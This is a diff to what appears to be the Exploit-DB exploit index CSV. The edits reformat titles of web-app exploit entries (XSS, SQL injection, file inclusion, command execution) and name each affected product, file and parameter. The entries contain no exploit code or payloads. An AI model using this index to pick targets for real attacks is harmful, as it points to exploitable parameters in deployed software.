4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 @@ -33604,12 +33605,12 @@ id,file,description,date,author,platform,type,port 33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 33290,platforms/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 33291,platforms/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 -33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp Operation Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 +33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - 'ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp?Operation' Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature 'ReqWebHelp/basic/searchView.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps,0 33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33296,platforms/php/webapps/33296.txt,"OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-21,"Amol Naik",php,webapps,0 -33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php' last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 +33297,platforms/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33298,platforms/php/webapps/33298.txt,"OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33299,platforms/php/webapps/33299.txt,"OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 33300,platforms/php/webapps/33300.txt,"OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 @@ -33725,7 +33726,7 @@ id,file,description,date,author,platform,type,port 33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Local File Inclusion",2010-01-15,"D. Fabian",php,webapps,0 33534,platforms/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation",2010-02-03,"Cory Marsh",php,webapps,0 -33637,platforms/php/webapps/33637.txt,"Joomla! Component Webee Comments 1.1/1.2 - index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 +33637,platforms/php/webapps/33637.txt,"Joomla! Component Webee Comments 1.1/1.2 - 'index2.php' articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 33638,platforms/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting Vulnerabilities",2009-11-15,"Jeff Channell",php,webapps,0 33639,platforms/php/webapps/33639.txt,"Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 @@ -33798,10 +33799,10 @@ id,file,description,date,author,platform,type,port 33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 -33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 +33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'index.jsp?error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 33706,platforms/php/webapps/33706.txt,"Drupal < 5.22/6.16 - Multiple Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0 -33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 +33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - 'surname' Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 @@ -33839,10 +33840,10 @@ id,file,description,date,author,platform,type,port 33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS - '/manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps,0 33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,php,webapps,0 33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal - 'index.php' SQL Injection",2010-03-15,"Easy Laster",php,webapps,0 -33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - dijit\tests\_testCommon.js theme Parameter Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps,0 +33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '\dijit\tests\_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps,0 33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 - 'doh\runner.html' Multiple Cross-Site Scripting Vulnerabilities",2010-03-15,"Adam Bixby",multiple,webapps,0 33766,platforms/php/webapps/33766.txt,"Joomla! Component com_as - 'catid' SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 -33787,platforms/php/webapps/33787.txt,"RepairShop2 - 'index.php' Prod Parameter Cross-Site Scripting",2010-03-23,kaMtiEz,php,webapps,0 +33787,platforms/php/webapps/33787.txt,"RepairShop2 - 'index.php?Prod' Cross-Site Scripting",2010-03-23,kaMtiEz,php,webapps,0 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Local File Inclusion",2010-03-17,7Safe,php,webapps,0 33771,platforms/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 @@ -33902,7 +33903,7 @@ id,file,description,date,author,platform,type,port 33882,platforms/php/webapps/33882.txt,"CyberCMS - 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps,0 33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - 'ZLanguage.php?lang' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 -33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 - 'index.php' func Parameter Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 +33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 - 'index.php?func' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 33887,platforms/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps,0 33888,platforms/php/webapps/33888.txt,"ProArcadeScript - 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps,0 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 - SQL Injection / Cross-Site Scripting",2010-04-27,indoushka,php,webapps,0 @@ -34240,18 +34241,18 @@ id,file,description,date,author,platform,type,port 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 -34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 +34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - 'scrivi.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,php,webapps,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34469,platforms/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 -34470,platforms/php/webapps/34470.txt,"Beex - 'news.php' navaction Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 +34470,platforms/php/webapps/34470.txt,"Beex - 'news.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34471,platforms/php/webapps/34471.txt,"Beex - 'partneralle.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34473,platforms/php/webapps/34473.txt,"Property Watch - 'email.php?videoid' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 +34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php?redirect' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34475,platforms/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0 34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 @@ -34262,7 +34263,7 @@ id,file,description,date,author,platform,type,port 34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0 34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0 -34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 +34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 34493,platforms/php/webapps/34493.txt,"Payment Processor Script (PPScript) - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps,0 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk - 'products.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 @@ -34270,7 +34271,7 @@ id,file,description,date,author,platform,type,port 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - 'product_details.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 -34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php' Filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 +34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php?Filter' Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 @@ -34289,7 +34290,7 @@ id,file,description,date,author,platform,type,port 34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0 -34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'Parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 +34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - 'idstatusframe.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-31,"Mr Teatime",php,webapps,0 34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - 'survey.php?category' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 34546,platforms/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - 'globals.php?tabpage' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 @@ -34310,7 +34311,7 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php' File Parameter Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 @@ -34417,7 +34418,7 @@ id,file,description,date,author,platform,type,port 34708,platforms/php/webapps/34708.pl,"Joomla! Component com_tax - 'eid' SQL Injection",2010-09-23,FL0RiX,php,webapps,0 34709,platforms/php/webapps/34709.txt,"Astrology - 'celebrities.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34710,platforms/php/webapps/34710.txt,"Paypal Shopping Cart Script - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-21,"599eme Man",php,webapps,0 -34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php' cid Parameter SQL Injection",2009-08-21,"599eme Man",php,webapps,0 +34711,platforms/php/webapps/34711.txt,"Paypal Shopping Cart Script - 'index.php?cid' SQL Injection",2009-08-21,"599eme Man",php,webapps,0 34712,platforms/php/webapps/34712.txt,"Freewebscriptz HUBScript - 'single_winner1.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34713,platforms/php/webapps/34713.txt,"Freelancers - 'placebid.php?id' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers - 'post_resume.php?jobid' Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 @@ -34433,9 +34434,9 @@ id,file,description,date,author,platform,type,port 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injections",2014-09-20,BillV-Lists,php,webapps,0 34730,platforms/php/webapps/34730.txt,"DragDropCart - '/assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34731,platforms/php/webapps/34731.txt,"DragDropCart - '/includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34732,platforms/php/webapps/34732.txt,"DragDropCart - 'index.php' search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34732,platforms/php/webapps/34732.txt,"DragDropCart - 'index.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34733,platforms/php/webapps/34733.txt,"DragDropCart - 'search.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34734,platforms/php/webapps/34734.txt,"DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34734,platforms/php/webapps/34734.txt,"DragDropCart - 'login.php?redirect' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34735,platforms/php/webapps/34735.txt,"DragDropCart - 'productdetail.php?product' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34736,platforms/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34737,platforms/php/webapps/34737.txt,"EZodiak - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 @@ -34462,12 +34463,12 @@ id,file,description,date,author,platform,type,port 34763,platforms/php/webapps/34763.txt,"OSClass 3.4.1 - 'index.php' Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34769,platforms/php/webapps/34769.txt,"MySITE - SQL Injection / Cross-Site Scripting",2010-09-27,MustLive,php,webapps,0 -34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman - 'index.php' n Parameter SQL Injection",2009-07-21,Moudi,php,webapps,0 -34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php' letters Parameter Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 +34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman - 'index.php?n' SQL Injection",2009-07-21,Moudi,php,webapps,0 +34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman - 'index.php?letters' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 34774,platforms/php/webapps/34774.txt,"HotScripts Type PHP Clone Script - 'feedback.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 -34775,platforms/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php' msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 +34775,platforms/php/webapps/34775.txt,"HotScripts Type PHP Clone Script - 'index.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34776,platforms/php/webapps/34776.txt,"HotScripts Type PHP Clone Script - 'lostpassword.php?msg' Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps,0 @@ -34509,7 +34510,7 @@ id,file,description,date,author,platform,type,port 34839,platforms/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",cgi,webapps,0 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 -34842,platforms/php/webapps/34842.txt,"TWiki 5.0 - bin/view rev Parameter Cross-Site Scripting",2010-10-14,"DOUHINE Davy",php,webapps,0 +34842,platforms/php/webapps/34842.txt,"TWiki 5.0 - '/bin/view?rev' Cross-Site Scripting",2010-10-14,"DOUHINE Davy",php,webapps,0 34843,platforms/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Cross-Site Scripting Vulnerabilities",2010-10-14,"DOUHINE Davy",php,webapps,0 34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 @@ -34540,8 +34541,8 @@ id,file,description,date,author,platform,type,port 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' HTML Injection",2010-10-21,"SecPod Research",php,webapps,0 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 -34893,platforms/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php rank' Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 -34894,platforms/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php rank' SQL Injection",2009-07-20,"599eme Man",php,webapps,0 +34893,platforms/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 +34894,platforms/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -34551,17 +34552,17 @@ id,file,description,date,author,platform,type,port 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - '/entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3?bn' Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - 'search.php?bn' Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 -34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/domain method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/group method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/gso method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/gsogroup method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/os method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/pop method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/rule method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/user method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 -34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/webseal method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - '/ivt/ivtserver?parm1' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/acl?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34909,platforms/multiple/webapps/34909.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/domain?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34910,platforms/multiple/webapps/34910.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/group?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34911,platforms/multiple/webapps/34911.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gso?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34912,platforms/multiple/webapps/34912.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/gsogroup?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34913,platforms/multiple/webapps/34913.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/os?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34914,platforms/multiple/webapps/34914.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/pop?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34915,platforms/multiple/webapps/34915.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/rule?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 +34916,platforms/multiple/webapps/34916.txt,"IBM Tivoli Access Manager for E-Business - '/ibm/wpm/user?method' Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 